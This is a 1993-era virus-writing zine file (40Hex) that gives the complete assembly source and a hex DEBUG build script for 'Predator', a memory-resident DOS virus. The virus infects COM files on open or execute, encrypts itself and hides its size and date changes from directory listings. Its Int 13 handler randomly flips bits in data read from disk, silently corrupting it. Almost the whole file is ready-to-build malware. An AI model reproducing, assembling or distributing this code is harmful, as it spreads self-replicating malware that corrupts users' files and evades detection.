40Hex Issue 11 Volume 3 Number 2 File 008 Predator Predator is a virus written by Phalcon/Skism's newest member, Priest. It incorporates a number of stealth features. It infects only COM files. Predator uses the "Century" technique of marking a virus infection; file dates are bumped up 100 years to designate an infection. --Predator Source Code--------------------------------------------------------- CSEG SEGMENT ASSUME CS:CSEG, ES:CSEG, SS:CSEG ORG 0h ; Source code of the Predator ; Priest Its_Me equ 'IM' Read_Only equ 1 Mem_Size equ offset Finish-offset Virus_Start ;amount of memory needed Virus_Size equ offset Virus_End-offset Virus_Start ;size of virus New_Virus_Size equ offset Finish-offset New_Virus ;size of virus w/ ;encryption Hundred_Years equ 0c8h Version equ 30h ;Get DOS Version Open equ 3dh ;Open File Ext_Open equ 6ch ;Extended Open File Execute equ 4bh ;Execute Find_FCB equ 11h ;Find File Control Block Find_FCB_Next equ 12h ;Find next FCB Open_FCB equ 0fh ;Open FCB Get_DTA equ 2fh ;Get DTA address Find_Dir equ 4eh ;Find file Find_Dir_Next equ 4fh ;Find next file Attribute equ 1 ;infection flags Opened equ 2 Written equ 4 Extended_FCB equ 0ffh ;Extended FCB will have the first ;byte equal to FFh Virus_Start: mov sp,bp ;restore Stack after decryption sti ;interrupts on mov ah,Version mov bx,Its_Me int 21h ;Check if already resident cmp ax,Its_Me jne Go_Res Jump_R_F: jmp Return_File Go_Res: mov ax,cs dec ax ;get segment of this MCB MCB_ds: mov ds,ax cmp byte ptr ds:[0],'Z' ;must be last Memory Control Block jne Jump_R_F Found_last_MCB: mov ax,Mem_Size ;Reserve enough for virus + data mov cl,4h shr ax,cl ;convert to paragraphs inc ax push ax dec ax shr ax,cl shr cl,1 shr ax,cl ;convert to kilobytes inc ax push ds xor bx,bx mov ds,bx sub word ptr ds:[413h],ax ;take memory from int 12 pop ds pop ax sub word ptr ds:[0003h],ax ;take it from availible memory mov ax,cs add ax,ds:[0003h] ;get segment of free memory mov es,ax push cs pop ds call $+3 ;next 3 instructions find Virus_Start pop si sub si,(offset $-1)-offset Virus_Start xor di,di mov cx,Mem_Size cld rep movsb ;copy us to High Memory push es mov ax,offset High_Start push ax retf ;jump up there Virus_Name: db 'Predator virus ' Copyright: db '(c) Mar. 93 ' Me: db 'Priest' File_Bytes db 0cdh, 20h, 0h ;first 3 bytes of infected .com file Com_Spec: db '.COM',0h ;only .com files can be infected High_Start: push cs pop ds mov ax,3521h ;get address of Int 21 int 21h mov word ptr ds:[Int_21],bx ;save it mov word ptr ds:[Int_21+2h],es mov al,13h ;get address of Int 13 int 21h mov word ptr ds:[Int_13],bx ;save it mov word ptr ds:[Int_13+2h],es mov ah,25h ;point Int 13 to our handler mov dx,offset New_13 int 21h mov al,21h ;21h too mov dx,offset New_21 int 21h xor ax,ax mov ds,ax mov ax,ds:[46ch] ;get a random number for push cs ; activation task pop ds xchg al,ah add word ptr ds:[Count_Down],ax ;Save it for count down Return_File: push ss pop es mov di,100h call $+3 ;get address of first 3 bytes of .com file pop si sub si,(offset $-1)-offset File_Bytes push ss push di cld movsw ;move them movsb push ss pop ds xor ax,ax retf ;jump to original program New_21: cmp ah,Open ;check function je Infect cmp ah,Ext_Open je Ext_File_Open cmp ah,Execute je Infect cmp ah,Find_FCB je Stealth_FCB cmp ah,Find_FCB_Next je Stealth_FCB cmp ah,Open_FCB je Stealth_FCB_O cmp ah,Find_Dir je Stealth_Dir cmp ah,Find_Dir_Next je Stealth_Dir cmp ah,Version ;other checking for us jne Jump_21 cmp bx,Its_Me jne Jump_21 mov ax,bx ;tell other that we're here Ret_21: retf 0002h Jump_21: jmp cs:Int_21 Stealth_Dir: jmp Hide_Find Stealth_FCB: jmp Hide_FCB Stealth_FCB_O: jmp Hide_FCB_O Infect_Error_J: jmp Infect_Error Ext_File_Open: mov word ptr cs:[File_Pnt],si ;Extended open uses DS:SI jmp short Infect_ds Infect: mov word ptr cs:[File_Pnt],dx ;Open & Execute use DS:DX Infect_ds: mov word ptr cs:[File_Pnt+2h],ds mov byte ptr cs:[Infect_Status],0h ;zero out progress byte call Push_All ;Push all registers call Hook_24 ;Hook Int 24 to avoid errors being displayed call Is_Com ;Is it a .com file? jb Infect_Error_J ;Carry flag set if it is not lds dx,cs:[File_Pnt] ;get saved address of file name mov ax,4300h ;fetch the attribute push ax call Old_21 pop ax jb Infect_Error_J mov byte ptr cs:[File_Attr],cl ;save attribute test cl,Read_Only ;no need to change if not read only je No_Attr_Rem xor cx,cx inc al call Old_21 ;if read only, then zero out jb Infect_Error_J or byte ptr cs:[Infect_Status],Attribute ;update progress byte No_Attr_Rem: mov ax,3dc2h ;open with write/compatibility call Old_21 jb Infect_Error_J xchg ax,bx ;handle into bx push cs pop ds or byte ptr ds:[Infect_Status],Opened ;update progress byte mov ax,5700h ;get date call Old_21 cmp dh,Hundred_Years ;is it infected? jnb Infect_Error add dh,Hundred_Years ;else add 100 years to date mov word ptr ds:[File_Date],dx ;save modified date mov word ptr ds:[File_Time],cx mov ah,3fh ;read first 3 bytes mov cx,3h mov dx,offset File_Bytes call Old_21 cmp ax,cx ;if error, then quit jne Infect_Error cmp word ptr ds:[File_Bytes],'MZ' ;no .exe files je Infect_Error cmp word ptr ds:[File_Bytes],'ZM' je Infect_Error mov al,2 ;set file pointer to end of file call Set_Pnt or dx,dx ;too big? jne Infect_Error cmp ax,1000 ;too small? jb Infect_Error cmp ax,0-2000 ;still too big? ja Infect_Error mov di,offset Jump_Bytes ;make a jump to end of file push ax add ax,100h ;these two are for the encryption mov word ptr ds:[Decrypt_Start_Off+1],ax push cs pop es mov al,0e9h ;e9h = JMP xxxx cld stosb pop ax sub ax,3h ; to end of file stosw call Encrypt_Virus ;encrypt the virus mov ah,40h ;write the encrypted virus and the ;decryption routine to file mov dx,offset New_Virus mov cx,New_Virus_Size call Old_21 jb Infect_Error or byte ptr ds:[Infect_Status],Written ;update progress byte xor al,al ;set file pointer to call Set_Pnt ;beginning of file mov ah,40h ;write the jump mov dx,offset Jump_Bytes mov cx,3h call Old_21 Infect_Error: test byte ptr cs:[Infect_Status],Opened ;was file opened? je Set_Attr test byte ptr cs:[Infect_Status],Written ;was file written to? je Close mov ax,5701h ;if infected, restore modified date mov dx,cs:[File_Date] mov cx,ds:[File_Time] call Old_21 Close: mov ah,3eh ;close file call Old_21 Set_Attr: test byte ptr cs:[Infect_Status],Attribute ;attribute changed? je Jump_Old_21 mov ax,4301h ;if changed, then restore it xor cx,cx mov cl,cs:[File_Attr] lds dx,cs:[File_Pnt] call Old_21 Jump_Old_21: call Unhook_24 ;unhook Int 24 call Pop_All ;pop all registers jmp Jump_21 ;jump to original int 21 Set_Pnt: mov ah,42h ;set file pointer w/ al as parameter xor cx,cx cwd ;zero out dx call Old_21 retn Pop_All: pop word ptr cs:[Ret_Add] ;save return address pop es pop ds pop si pop di pop bp pop dx pop cx pop bx pop ax popf jmp cs:[Ret_Add] ;jump to return address Push_All: pop word ptr cs:[Ret_Add] ;save return address pushf push ax push bx push cx push dx push bp push di push si push ds push es jmp cs:[Ret_Add] ;jump to return address Hook_24: call Push_All ;push all registers mov ax,3524h ;get int 24 address call Old_21 mov word ptr cs:[Int_24],bx ;save address mov word ptr cs:[Int_24+2h],es mov ah,25h ;set new address to us push cs pop ds mov dx,offset New_24 call Old_21 call Pop_All ;pop all registers retn Unhook_24: call Push_All mov ax,2524h ;set old address back lds dx,cs:[Int_24] Call Old_21 call Pop_All retn New_24: mov al,3h ;int 24, fail iret Old_21: pushf ;call to original int 21 call cs:Int_21 retn ;Hide_Find hides the file size increase for functions 4eh and 4fh and the ;date change Hide_Find: call Old_21 ;do the search call Push_All ;push all registers jb Hide_File_Error mov ah,2fh ;get DTA address call Old_21 cmp byte ptr es:[bx.DTA_File_Date+1h],Hundred_Years ;Is it jb Hide_File_Error ;infected? sub byte ptr es:[bx.DTA_File_Date+1h],Hundred_Years ;Take ;away 100 years from date sub word ptr es:[bx.DTA_File_Size],New_Virus_Size ;take ;away Virus_Size from file size sbb word ptr es:[bx.DTA_File_Size+2],0 ;subtract remainder ;although there will not be one ; I included it for expandibility ; (i.e. infecting .exe files) Hide_File_Error:call Pop_All ;pop all registers jmp Ret_21 ;Hide_FCB hides the file size increase for functions 11h and 12h and the ;date change Hide_FCB: call Old_21 ;find file call Push_All ;push registers or al,al ;al=0 if no error jne Hide_FCB_Error mov ah,Get_DTA ;get address of DTA call Old_21 cmp byte ptr ds:[bx],Extended_FCB ;is it an extended FCB? jne Hide_FCB_Reg add bx,7h ;yes, add 7 to address to skip garbage Hide_FCB_Reg: cmp byte ptr es:[bx.DS_Date+1h],Hundred_Years ;Is it infected? jb Hide_FCB_Error sub byte ptr es:[bx.DS_Date+1h],Hundred_Years ;yes, restore ;date sub word ptr es:[bx.DS_File_Size],New_Virus_Size ;fix size sbb word ptr es:[bx.DS_File_Size+2],0 ;and remainder Hide_FCB_Error: call Pop_All ;pop all registers jmp Ret_21 ;Hide_FCB_O hides the file size increase for function 0fh and the ;date change Hide_FCB_O: call Old_21 ;open FCB call Push_All ;push all registers cmp al,0h ;al=0 if opened, else error jne Hide_FCB_O_Error mov bx,dx ;pointer into bx cmp byte ptr ds:[bx],Extended_FCB ;is it an extended FCB? jne Hide_FCB_No_E add bx,7h ;yes, add 7 to skip garbage Hide_FCB_No_E: cmp byte ptr ds:[bx.FCB_File_Date+1h],Hundred_Years ;infected? jb Hide_FCB_O_Error sub byte ptr ds:[bx.FCB_File_Date+1h],Hundred_Years ;yes, ;fix date sub word ptr ds:[bx.FCB_File_Size],New_Virus_Size ;fix size sbb word ptr ds:[bx.FCB_File_Size+2h],0 ;and remainder Hide_FCB_O_Error:call Pop_All ;pop all registers jmp Ret_21 Is_Com: push cs pop ds les di,ds:[File_Pnt] ;get address of file xor al,al mov cx,7fh cld repne scasb ;scan for null byte at end of file name cmp cx,7fh-5h ;must be at least 5 bytes long, ;including ext. (.COM) jnb Is_Not_Com mov cx,5h ;compare last five bytes to ".COM",0 sub di,cx mov si,offset Com_Spec ;offset of ".COM",0 cld rep cmpsb ;compare them jne Is_Not_Com clc ;if .com file, then clear carry flag retn Is_Not_Com: stc ;else set it retn ;This is the interrupt 13 handle, it's sole purpose is to complement a ;random bit after a random number of sectors (1-65535) have been read. New_13: cmp ah,2h ;Is a sector going to be read je Read_Sector Jump_13: jmp cs:Int_13 ;no, continue on Ret_13: call Pop_All ;pop all registers retf 0002h Read_Sector: mov byte ptr cs:[Sub_Value],al ;save number of sectors read pushf call cs:Int_13 ;read the sectors call Push_All ;push flags jb Ret_13 ;jump if error to return mov al,cs:[Sub_Value] ;get number of sectors read cbw sub word ptr cs:[Count_Down],ax ;subtract it from our count ja Ret_13 ;down mov bx,200h ;200h bytes per sector cwd ;zero dx mul bx ;mul # of sectors by 200 dec ax ;minus one xor cx,cx mov ds,cx mov cx,ds:[46ch] ;get random value mov word ptr cs:[Count_Down],cx ;move it into count down push cx and cx,ax ;cx must be < ax add bx,cx ;add it to the address of pop cx ;where the sectors were read add cl,ch ;randomize cl rcr word ptr es:[bx],cl ;get a random bit cmc ;reverse it rcl word ptr es:[bx],cl ;put it back jmp short Ret_13 ;jump to return ;The Encrypt_Virus module copies the decryption routine and an encrypted ;copy of the virus to a buffer Encrypt_Virus: xor ax,ax mov ds,ax mov ax,ds:[46ch] ;get random value push cs pop ds add byte ptr ds:[Decrypt_Value],al ;use as encryption key mov al,ds:[Decrypt_Value] ;get encryption key add ah,al ;randomize ah add byte ptr ds:[Decrypt_Random],ah ;put random garbage mov si,offset Decrypt_Code ;copy decryption routine mov di,offset New_Virus mov cx,offset Decrypt_End-offset Decrypt_Code cld rep movsb ;to buffer mov si,offset Virus_Start ;copy virus mov cx,((Virus_Size)/2)+1 Encrypt_Loop: xchg ax,cx push ax lodsw rol ax,cl ;and encrypt not ax stosw ;to buffer pop ax xchg ax,cx loop Encrypt_Loop dec di ;fix pointer for dec di ;decryption routine sub di,offset New_Virus ;point decryption's SP to end of ;encrypted code for proper ;decryption add word ptr ds:[New_Virus+(Decrypt_Start_Off+1-Decrypt_Code)],di retn ;Decryption routine Decrypt_Code: mov dx,((Virus_Size)/2)+1 db 0b1h ;mov cl, Decrypt_Value db ? cli mov bp,sp Decrypt_Start_Off:mov sp,1234h Decrypt_Loop: pop ax not ax ror ax,cl push ax jmp short $+3 Decrypt_Random: db 12h dec sp dec sp dec dx jne Decrypt_Loop Decrypt_End: db ? Virus_End: Jump_Bytes db 3 dup(0) Int_13 dd ? Int_21 dd ? Int_24 dd ? Ret_Add dw ? File_Pnt dd ? Infect_Status db ? File_Time dw ? File_Date dw ? File_Attr db ? Count_Down dw ? Sub_Value db ? New_Virus db Virus_Size+(offset Decrypt_End-offset Decrypt_Code)+1 dup(0) Finish: ;various structures Directory STRUC DS_Drive db ? DS_File_Name db 8 dup(0) DS_File_Ext db 3 dup(0) DS_File_Attr db ? DS_Reserved db 10 dup(0) DS_Time dw ? DS_Date dw ? DS_Start_Clust dw ? DS_File_Size dd ? Directory ENDS FCB STRUC FCB_Drive db ? FCB_File_Name db 8 dup(0) FCB_File_Ext db 3 dup(0) FCB_Block dw ? FCB_Rec_Size dw ? FCB_File_Size dd ? FCB_File_Date dw ? FCB_File_Time dw ? FCB_Reserved db 8 dup(0) FCB_Record db ? FCB_Random dd ? FCB ENDS DTA STRUC DTA_Reserved db 21 dup(0) DTA_File_Attr db ? DTA_File_Time dw ? DTA_File_Date dw ? DTA_File_Size dd ? DTA_File_Name db 13 dup(0) DTA ENDS CSEG ENDS END Virus_Start --Predator Debug Script-------------------------------------------------------- n predator.com e 0100 8B E5 FB B4 30 BB 4D 49 CD 21 3D 4D 49 75 03 E9 e 0110 AF 00 8C C8 48 8E D8 80 3E 00 00 5A 75 F1 B8 64 e 0120 08 B1 04 D3 E8 40 50 48 D3 E8 D0 E9 D3 E8 40 1E e 0130 33 DB 8E DB 29 06 13 04 1F 58 29 06 03 00 8C C8 e 0140 03 06 03 00 8E C0 0E 1F E8 00 00 5E 81 EE 4B 00 e 0150 33 FF B9 64 08 FC F3 A4 06 B8 89 00 50 CB 50 72 e 0160 65 64 61 74 6F 72 20 76 69 72 75 73 20 20 28 63 e 0170 29 20 4D 61 72 2E 20 39 33 20 20 50 72 69 65 73 e 0180 74 CD 20 00 2E 43 4F 4D 00 0E 1F B8 21 35 CD 21 e 0190 89 1E 1D 04 8C 06 1F 04 B0 13 CD 21 89 1E 19 04 e 01A0 8C 06 1B 04 B4 25 BA 6D 03 CD 21 B0 21 BA D8 00 e 01B0 CD 21 33 C0 8E D8 A1 6C 04 0E 1F 86 C4 01 06 31 e 01C0 04 16 07 BF 00 01 E8 00 00 5E 81 EE 48 00 16 57 e 01D0 FC A5 A4 16 1F 33 C0 CB 80 FC 3D 74 4B 80 FC 6C e 01E0 74 3F 80 FC 4B 74 41 80 FC 11 74 2C 80 FC 12 74 e 01F0 27 80 FC 0F 74 25 80 FC 4E 74 1A 80 FC 4F 74 15 e 0200 80 FC 30 75 0B 81 FB 4D 49 75 05 8B C3 CA 02 00 e 0210 2E FF 2E 1D 04 E9 9A 01 E9 C5 01 E9 FA 01 E9 DC e 0220 00 2E 89 36 27 04 EB 05 2E 89 16 27 04 2E 8C 1E e 0230 29 04 2E C6 06 2B 04 00 E8 26 01 E8 37 01 E8 08 e 0240 02 72 DB 2E C5 16 27 04 B8 00 43 50 E8 5C 01 58 e 0250 72 CC 2E 88 0E 30 04 F6 C1 01 74 0F 33 C9 FE C0 e 0260 E8 48 01 72 B9 2E 80 0E 2B 04 01 B8 C2 3D E8 3A e 0270 01 72 AB 93 0E 1F 80 0E 2B 04 02 B8 00 57 E8 2A e 0280 01 80 FE C8 73 77 80 C6 C8 89 16 2E 04 89 0E 2C e 0290 04 B4 3F B9 03 00 BA 81 00 E8 0F 01 3B C1 75 5D e 02A0 81 3E 81 00 5A 4D 74 55 81 3E 81 00 4D 5A 74 4D e 02B0 B0 02 E8 8F 00 0B D2 75 44 3D E8 03 72 3F 3D 30 e 02C0 F8 77 3A BF 16 04 50 05 00 01 A3 05 04 0E 07 B0 e 02D0 E9 FC AA 58 2D 03 00 AB E8 E2 01 B4 40 BA 34 04 e 02E0 B9 30 04 E8 C5 00 72 15 80 0E 2B 04 04 32 C0 E8 e 02F0 52 00 B4 40 BA 16 04 B9 03 00 E8 AE 00 2E F6 06 e 0300 2B 04 02 74 1C 2E F6 06 2B 04 04 74 0F B8 01 57 e 0310 2E 8B 16 2E 04 8B 0E 2C 04 E8 8F 00 B4 3E E8 8A e 0320 00 2E F6 06 2B 04 01 74 12 B8 01 43 33 C9 2E 8A e 0330 0E 30 04 2E C5 16 27 04 E8 70 00 E8 58 00 E8 0C e 0340 00 E9 CC FE B4 42 33 C9 99 E8 5F 00 C3 2E 8F 06 e 0350 25 04 07 1F 5E 5F 5D 5A 59 5B 58 9D 2E FF 26 25 e 0360 04 2E 8F 06 25 04 9C 50 53 51 52 55 57 56 1E 06 e 0370 2E FF 26 25 04 E8 E9 FF B8 24 35 E8 2D 00 2E 89 e 0380 1E 21 04 2E 8C 06 23 04 B4 25 0E 1F BA A8 02 E8 e 0390 19 00 E8 B8 FF C3 E8 C8 FF B8 24 25 2E C5 16 21 e 03A0 04 E8 07 00 E8 A6 FF C3 B0 03 CF 9C 2E FF 1E 1D e 03B0 04 C3 E8 F6 FF E8 A9 FF 72 20 B4 2F E8 EC FF 26 e 03C0 80 BF 19 00 C8 72 13 26 80 AF 19 00 C8 26 81 AF e 03D0 1A 00 30 04 26 83 9F 1C 00 00 E8 70 FF E9 2D FE e 03E0 E8 C8 FF E8 7B FF 0A C0 75 28 B4 2F E8 BC FF 80 e 03F0 3F FF 75 03 83 C3 07 26 80 BF 1A 00 C8 72 13 26 e 0400 80 AF 1A 00 C8 26 81 AF 1D 00 30 04 26 83 9F 1F e 0410 00 00 E8 38 FF E9 F5 FD E8 90 FF E8 43 FF 3C 00 e 0420 75 21 8B DA 80 3F FF 75 03 83 C3 07 80 BF 15 00 e 0430 C8 72 10 80 AF 15 00 C8 81 AF 10 00 30 04 83 9F e 0440 12 00 00 E8 07 FF E9 C4 FD 0E 1F C4 3E 27 04 32 e 0450 C0 B9 7F 00 FC F2 AE 83 F9 7A 73 0F B9 05 00 2B e 0460 F9 BE 84 00 FC F3 A6 75 02 F8 C3 F9 C3 80 FC 02 e 0470 74 0B 2E FF 2E 19 04 E8 D3 FE CA 02 00 2E A2 33 e 0480 04 9C 2E FF 1E 19 04 E8 D7 FE 72 EB 2E A0 33 04 e 0490 98 2E 29 06 31 04 77 DF BB 00 02 99 F7 E3 48 33 e 04A0 C9 8E D9 8B 0E 6C 04 2E 89 0E 31 04 51 23 C8 03 e 04B0 D9 59 02 CD 26 D3 1F F5 26 D3 17 EB BA 33 C0 8E e 04C0 D8 A1 6C 04 0E 1F 00 06 00 04 A0 00 04 02 E0 00 e 04D0 26 0F 04 BE FC 03 BF 34 04 B9 19 00 FC F3 A4 BE e 04E0 00 00 B9 0C 02 91 50 AD D3 C0 F7 D0 AB 58 91 E2 e 04F0 F4 4F 4F 81 EF 34 04 01 3E 3D 04 C3 BA 0C 02 B1 e 0500 00 FA 8B EC BC 34 12 58 F7 D0 D3 C8 50 EB 01 12 e 0510 4C 4C 4A 75 F2 00 00 00 00 00 00 00 00 00 00 00 e 0520 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0530 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0540 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0550 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0560 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0570 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0580 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0590 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 05A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 05B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 05C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 05D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 05E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 05F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0600 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0610 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0620 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0630 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0640 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0650 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0660 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0670 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0680 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0690 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 06A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 06B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 06C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 06D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 06E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 06F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0700 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0710 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0720 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0730 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0740 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0750 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0760 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0770 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0780 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0790 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 07A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 07B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 07C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 07D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 07E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 07F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0800 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0810 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0820 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0830 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0840 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0850 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0860 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0870 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0880 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0890 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 08A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 08B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 08C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 08D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 08E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 08F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0900 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0910 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0920 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0930 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0940 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0950 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e 0960 00 00 00 00 rcx 0864 w q -------------------------------------------------------------------------------